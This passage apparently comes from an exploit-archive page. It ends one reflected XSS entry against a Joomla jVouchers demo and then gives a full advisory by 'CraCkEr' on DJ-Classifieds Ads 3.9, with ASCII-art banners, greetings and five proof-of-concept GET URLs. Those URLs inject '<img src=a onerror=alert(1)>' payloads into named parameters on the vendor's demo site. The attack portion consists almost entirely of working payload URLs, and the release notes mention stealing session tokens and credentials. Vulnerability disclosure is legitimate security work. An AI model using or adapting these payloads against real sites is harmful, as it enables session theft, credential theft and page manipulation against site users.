/>https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=ugb9n%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20zn67rnvkbhb&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : DJ-Extensions │<br />│ Software : DJ-Classifieds Ads 3.9 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'start' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/?start=6khflc"><img src=a onerror=alert(1)>hqr03<br /><br />GET parameter 'task' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?task=parsesearchppbyq"><img src=a onerror=alert(1)>a8ex2<br /><br />GET parameter 'se' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=ce3x1"><img src=a onerror=alert(1)>jlih5<br /><br />GET parameter 'se_radius_unit' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=kmjqbjk"><img src=a onerror=alert(1)>cnrhh<br /><br />GET parameter 'se_radius' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=km&se_radius=50k1yfg"><img src=a onerror=alert(1)>y1lp9<br /><br /><br /><br />[-] Done<br /></code></pre>